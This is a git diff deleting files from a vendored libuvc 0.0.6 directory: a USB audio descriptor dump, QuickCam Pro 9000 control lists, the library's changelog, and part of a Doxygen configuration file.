-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          1
-        bSourceID               5
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 5
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x03
-          Mute
-          Volume
-        bmaControls( 1)      0x00
-        iFeature                0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        16000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0044  1x 68 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        24000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0064  1x 100 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        32000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0084  1x 132 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        48000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c4  1x 196 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt
deleted file mode 100644
index 2b2969e..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt
+++ /dev/null
@@ -1,13 +0,0 @@
-Listing available controls for device video0:
-  Exposure, Auto Priority
-  Exposure (Absolute)
-  Exposure, Auto
-  Backlight Compensation
-  Sharpness
-  White Balance Temperature
-  Power Line Frequency
-  Gain
-  White Balance Temperature, Auto
-  Saturation
-  Contrast
-  Brightness
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt
deleted file mode 100644
index 205aaf6..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-Listing available controls for device video0:
-  Raw bits per pixel
-  Disable video processing
-  LED1 Frequency
-  LED1 Mode
-  Focus
-  Exposure, Auto Priority
-  Exposure (Absolute)
-  Exposure, Auto
-  Backlight Compensation
-  Sharpness
-  White Balance Temperature
-  Power Line Frequency
-  Gain
-  White Balance Temperature, Auto
-  Saturation
-  Contrast
-  Brightness
diff --git a/thirdparty/libuvc-0.0.6/changelog.txt b/thirdparty/libuvc-0.0.6/changelog.txt
deleted file mode 100644
index 1f569d1..0000000
--- a/thirdparty/libuvc-0.0.6/changelog.txt
+++ /dev/null
@@ -1,45 +0,0 @@
-Changes in 0.0.5 (2014-07-19)
-----------------
-
-New features:
- - Added support for all of the camera terminal and processing unit controls, including the controls
-   that appeared in UVC 1.1 and 1.5.
- - Added LIBUVC_VERSION_GTE(major, minor, patch) macro.
-
-Bug fixes:
- - Switching to explicit kernel driver detachment since auto_detach isn't available in libusb < 1.0.16.
- - The cmake module now looks for libuvc.dylib instead of libuvc.so on OS X.
-
-
-Changes in 0.0.4 (2014-06-26)
-----------------
-
-New features:
- - Support devices with multiple streaming interfaces and multiple concurrent streams.
-   A new uvc_stream* API is added, along with a uvc_stream_handle type to encapsulate the
-   state of a single UVC stream. Multiple streams can run alongside each other, provided
-   your USB connection has enough bandwidth. Streams can be individually stopped and
-   resumed; the old uvc_start/stop_streaming API is still provided as a convenient way
-   to interact with the usual one-stream devices.
- - Added support for MJPEG streams.
- - Added functions for checking/setting autofocus mode.
- - Added an interface to set/get arbitrary controls on units and terminals.
- - Made the input, output, processing and extension units public.
- - Implemented uvc_get_device and uvc_get_libusb_handle.
- - Add a library-owned flag to uvc_frame_t so that users may allocate their own frame buffers.
-
-Bug fixes:
- - Send frames as soon as they're received, not when the following frame arrives
- - Fixed call to NULL when no status callback is provided.
- - Fixed crash that occurred during shutdown if the USB device was disconnected during streaming.
-
-Miscellaneous improvements:
- - Hid the transfer method (isochronous vs bulk) from the user. This was never really
-   selectable; the camera's streaming interface supports either bulk or isochronous
-   transfers, so now libuvc will figure out which one is appropriate. The `isochronous`
-   parameter has been converted to a `flags` parameter, which is currently unused but
-   could be used to convey up to 7 bits of stream mode information in the future.
- - Improved the method for claiming the camera's interfaces.
- - Renamed UVC_COLOR_FORMAT_* to UVC_FRAME_FORMAT_*. The old #defines are still available.
- - Simplified format definition and lookup.
- - Improved transfer status (error) handling.
diff --git a/thirdparty/libuvc-0.0.6/doxygen.conf b/thirdparty/libuvc-0.0.6/doxygen.conf
deleted file mode 100644
index 226134a..0000000
--- a/thirdparty/libuvc-0.0.6/doxygen.conf
+++ /dev/null
@@ -1,2284 +0,0 @@
-# Doxyfile 1.8.5
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a double hash (##) is considered a comment and is placed in
-# front of the TAG it is preceding.
-#
-# All text after a single hash (#) is considered a comment and will be ignored.
-# The format is:
-# TAG = value [value, ...]
-# For lists, items can also be appended using:
-# TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (\" \").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all text
-# before the first occurrence of this tag. Doxygen uses libiconv (or the iconv
-# built into libc) for the transcoding. See http://www.gnu.org/software/libiconv
-# for the list of possible encodings.
-# The default value is: UTF-8.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or a sequence of words surrounded by
-# double-quotes, unless you are using Doxywizard) that should identify the
-# project for which the documentation is generated. This name is used in the
-# title of most generated pages and in a few other places.
-# The default value is: My Project.
-
-PROJECT_NAME           = libuvc
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number. This
-# could be handy for archiving the generated documentation or if some version
-# control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer a
-# quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is included in
-# the documentation. The maximum height of the logo should not exceed 55 pixels
-# and the maximum width should not exceed 200 pixels. Doxygen will copy the logo
-# to the output directory.
-
-PROJECT_LOGO           =
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) path
-# into which the generated documentation will be written. If a relative path is
-# entered, it will be relative to the location where doxygen was started. If
-# left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       =
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create 4096 sub-
-# directories (in 2 levels) under the output directory of each output format and
-# will distribute the generated files over these directories. Enabling this
-# option can be useful when feeding doxygen a huge amount of source files, where
-# putting all generated files in the same directory would otherwise causes
-# performance problems for the file system.
-# The default value is: NO.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# Possible values are: Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-
-# Traditional, Croatian, Czech, Danish, Dutch, English, Esperanto, Farsi,
-# Finnish, French, German, Greek, Hungarian, Italian, Japanese, Japanese-en,
-# Korean, Korean-en, Latvian, Norwegian, Macedonian, Persian, Polish,
-# Portuguese, Romanian, Russian, Serbian, Slovak, Slovene, Spanish, Swedish,
-# Turkish, Ukrainian and Vietnamese.
-# The default value is: English.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES doxygen will include brief member
-# descriptions after the members that are listed in the file and class
-# documentation (similar to Javadoc). Set to NO to disable this.
-# The default value is: YES.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES doxygen will prepend the brief
-# description of a member or function before the detailed description
-#
-# Note: If both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-# The default value is: YES.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator that is
-# used to form the text in various listings. Each string in this list, if found
-# as the leading text of the brief description, will be stripped from the text
-# and the result, after processing the whole list, is used as the annotated
-# text. Otherwise, the brief description is used as-is. If left blank, the
-# following values are used ($name is automatically replaced with the name of
-# the entity):The $name class, The $name widget, The $name file, is, provides,
-# specifies, contains, represents, a, an and the.
-
-ABBREVIATE_BRIEF       =
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# doxygen will generate a detailed section even if there is only a brief
-# description.
-# The default value is: NO.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-# The default value is: NO.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES doxygen will prepend the full path
-# before files name in the file list and in the header files. If set to NO the
-# shortest path that makes the file name unique will be used
-# The default value is: YES.
-
-FULL_PATH_NAMES        = NO
-
-# The STRIP_FROM_PATH tag can be used to strip a user-defined part of the path.
-# Stripping is only done if one of the specified strings matches the left-hand
-# part of the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the path to
-# strip.
-#
-# Note that you can specify absolute paths here, but also relative paths, which
-# will be relative from the directory where doxygen is started.
-# This tag requires that the tag FULL_PATH_NAMES is set to YES.
-
-STRIP_FROM_PATH        =
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of the
-# path mentioned in the documentation of a class, which tells the reader which
-# header file to include in order to use a class. If left blank only the name of
-# the header file containing the class definition is used. Otherwise one should
-# specify the list of include paths that are normally passed to the compiler
-# using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter (but
-# less readable) file names. This can be useful is your file systems doesn't
-# support long names like on DOS, Mac, or CD-ROM.
-# The default value is: NO.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then doxygen will interpret the
-# first line (until the first dot) of a Javadoc-style comment as the brief
-# description. If set to NO, the Javadoc-style will behave just like regular Qt-
-# style comments (thus requiring an explicit @brief command for a brief
-# description.)
-# The default value is: NO.
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then doxygen will interpret the first
-# line (until the first dot) of a Qt-style comment as the brief description. If
-# set to NO, the Qt-style will behave just like regular Qt-style comments (thus
-# requiring an explicit \brief command for a brief description.)
-# The default value is: NO.
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make doxygen treat a
-# multi-line C++ special comment block (i.e. a block of //! or /// comments) as
-# a brief description. This used to be the default behavior. The new default is
-# to treat a multi-line C++ comment block as a detailed description. Set this
-# tag to YES if you prefer the old behavior instead.
-#
-# Note that setting this tag to YES also means that rational rose comments are
-# not recognized any more.
-# The default value is: NO.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES then an undocumented member inherits the
-# documentation from any documented member that it re-implements.
-# The default value is: YES.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce a
-# new page for each member. If set to NO, the documentation of a member will be
-# part of the file/class/namespace that contains it.
-# The default value is: NO.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab. Doxygen
-# uses this value to replace tabs by spaces in code fragments.
-# Minimum value: 1, maximum value: 16, default value: 4.
-
-TAB_SIZE               = 4
-
-# This tag can be used to specify a number of aliases that act as commands in
-# the documentation. An alias has the form:
-# name=value
-# For example adding
-# "sideeffect=@par Side Effects:\n"
-# will allow you to put the command \sideeffect (or @sideeffect) in the
-# documentation, which will result in a user-defined paragraph with heading
-# "Side Effects:". You can put \n's in the value part of an alias to insert
-# newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding "class=itcl::class"
-# will allow you to use the command class in the itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C sources
-# only. Doxygen will then generate output that is more tailored for C. For
-# instance, some of the names that are used will be different. The list of all
-# members will be omitted, etc.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java or
-# Python sources only. Doxygen will then generate output that is more tailored
-# for that language. For instance, namespaces will be presented as packages,
-# qualified scopes will look different, etc.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources. Doxygen will then generate output that is tailored for Fortran.
-# The default value is: NO.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for VHDL.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given
-# extension. Doxygen has a built-in mapping, but you can override or extend it
-# using this tag. The format is ext=language, where ext is a file extension, and
-# language is one of the parsers supported by doxygen: IDL, Java, Javascript,
-# C#, C, C++, D, PHP, Objective-C, Python, Fortran, VHDL. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C.
-#
-# Note For files without extension you can use no_extension as a placeholder.
-#
-# Note that for custom extensions you also need to set FILE_PATTERNS otherwise
-# the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If the MARKDOWN_SUPPORT tag is enabled then doxygen pre-processes all comments
-# according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you can
-# mix doxygen, HTML, and XML commands with Markdown formatting. Disable only in
-# case of backward compatibilities issues.
-# The default value is: YES.
-
-MARKDOWN_SUPPORT       = YES
-
-# When enabled doxygen tries to link words that correspond to documented
-# classes, or namespaces to their corresponding documentation. Such a link can
-# be prevented in individual cases by by putting a % sign in front of the word
-# or globally by setting AUTOLINK_SUPPORT to NO.
-# The default value is: YES.
-
-AUTOLINK_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should set this
-# tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string);
-# versus func(std::string) {}). This also make the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-# The default value is: NO.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-# The default value is: NO.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip (see:
-# http://www.riverbankcomputing.co.uk/software/sip/intro) sources only. Doxygen
-# will parse them like normal C++ but will assume all classes use public instead
-# of private inheritance when no explicit protection keyword is present.
-# The default value is: NO.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate
-# getter and setter methods for a property. Setting this option to YES will make
-# doxygen to replace the get and set methods by a property in the documentation.
-# This will only work if the methods are indeed getting or setting a simple
-# type. If this is not the case, or you want to show the methods anyway, you
-# should set this option to NO.
-# The default value is: YES.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-# The default value is: NO.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES to allow class member groups of the same type
-# (for instance a group of public functions) to be put as a subgroup of that
-# type (e.g. under the Public Functions section). Set it to NO to prevent
-# subgrouping. Alternatively, this can be done per class using the
-# \nosubgrouping command.
-# The default value is: YES.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and unions
-# are shown inside the group in which they are included (e.g. using \ingroup)
-# instead of on a separate page (for HTML and Man pages) or section (for LaTeX
-# and RTF).
-#
-# Note that this feature does not work in combination with
-# SEPARATE_MEMBER_PAGES.
-# The default value is: NO.
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and unions
-# with only public data fields or simple typedef fields will be shown inline in
-# the documentation of the scope in which they are defined (i.e. file,
-# namespace, or group documentation), provided this scope is documented. If set
-# to NO, structs, classes, and unions are shown on a separate page (for HTML and
-# Man pages) or section (for LaTeX and RTF).
-# The default value is: NO.
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT tag is enabled, a typedef of a struct, union, or
-# enum is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically be
-# useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-# The default value is: NO.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The size of the symbol lookup cache can be set using LOOKUP_CACHE_SIZE. This
-# cache is used to resolve symbols given their name and scope. Since this can be
-# an expensive process and often the same symbol appears multiple times in the
-# code, doxygen keeps a cache of pre-resolved symbols. If the cache is too small
-# doxygen will become slower. If the cache is too large, memory is wasted. The
-# cache size is given by this formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range
-# is 0..9, the default is 0, corresponding to a cache size of 2^16=65536
-# symbols. At the end of a run doxygen will report the cache usage and suggest
-# the optimal cache size from a speed point of view.
-# Minimum value: 0, maximum value: 9, default value: 0.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available. Private
-# class members and static file members will be hidden unless the
-# EXTRACT_PRIVATE respectively EXTRACT_STATIC tags are set to YES.
-# Note: This will also disable the warnings about undocumented members that are
-# normally produced when WARNINGS is set to YES.
-# The default value is: NO.
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class will
-# be included in the documentation.
-# The default value is: NO.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal
-# scope will be included in the documentation.
-# The default value is: NO.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file will be
-# included in the documentation.
-# The default value is: NO.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs) defined
-# locally in source files will be included in the documentation. If set to NO
-# only classes defined in header files are included. Does not have any effect
-# for Java sources.
-# The default value is: YES.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local methods,
-# which are defined in the implementation section but not in the interface are
-# included in the documentation. If set to NO only methods in the interface are
-# included.
-# The default value is: NO.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base name of
-# the file that contains the anonymous namespace. By default anonymous namespace
-# are hidden.
-# The default value is: NO.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, doxygen will hide all
-# undocumented members inside documented classes or files. If set to NO these
-# members will be included in the various overviews, but no documentation
-# section is generated. This option has no effect if EXTRACT_ALL is enabled.
-# The default value is: NO.
-
-HIDE_UNDOC_MEMBERS     = YES
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy. If set
-# to NO these classes will be included in the various overviews. This option has
-# no effect if EXTRACT_ALL is enabled.
-# The default value is: NO.
-
-HIDE_UNDOC_CLASSES     = YES
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, doxygen will hide all friend
-# (class|struct|union) declarations. If set to NO these declarations will be
-# included in the documentation.
-# The default value is: NO.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, doxygen will hide any
-# documentation blocks found inside the body of a function. If set to NO these
-# blocks will be appended to the function's detailed documentation block.
-# The default value is: NO.
-
-HIDE_IN_BODY_DOCS      = YES
-
-# The INTERNAL_DOCS tag determines if documentation that is typed after a
-# \internal command is included. If the tag is set to NO then the documentation
-# will be excluded. Set it to YES to include the internal documentation.
-# The default value is: NO.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then doxygen will only generate file
-# names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-# The default value is: system dependent.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO then doxygen will show members with
-# their full class and namespace scopes in the documentation. If set to YES the
-# scope will be hidden.
-# The default value is: NO.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES then doxygen will put a list of
-# the files that are included by a file in the documentation of that file.
-# The default value is: YES.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then doxygen will list include
-# files with double quotes in the documentation rather than with sharp brackets.
-# The default value is: NO.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES then a tag [inline] is inserted in the
-# documentation for inline members.
-# The default value is: YES.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES then doxygen will sort the
-# (detailed) documentation of file and class members alphabetically by member
-# name. If set to NO the members will appear in declaration order.
-# The default value is: YES.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the brief
-# descriptions of file, namespace and class members alphabetically by member
-# name. If set to NO the members will appear in declaration order.
-# The default value is: NO.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen will sort the
-# (brief and detailed) documentation of class members so that constructors and
-# destructors are listed first. If set to NO the constructors will appear in the
-# respective orders defined by SORT_BRIEF_DOCS and SORT_MEMBER_DOCS.
-# Note: If SORT_BRIEF_DOCS is set to NO this option is ignored for sorting brief
-# member documentation.
-# Note: If SORT_MEMBER_DOCS is set to NO this option is ignored for sorting
-# detailed member documentation.
-# The default value is: NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the hierarchy
-# of group names into alphabetical order. If set to NO the group names will
-# appear in their defined order.
-# The default value is: NO.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be sorted by
-# fully-qualified names, including namespaces. If set to NO, the class list will
-# be sorted only by class name, not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the alphabetical
-# list.
-# The default value is: NO.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to do proper
-# type resolution of all parameters of a function it will reject a match between
-# the prototype and the implementation of a member function even if there is
-# only one candidate or it is obvious which candidate to choose by doing a
-# simple string match. By disabling STRICT_PROTO_MATCHING doxygen will still
-# accept a match between prototype and implementation in such cases.
-# The default value is: NO.
-
-STRICT_PROTO_MATCHING  = NO
-
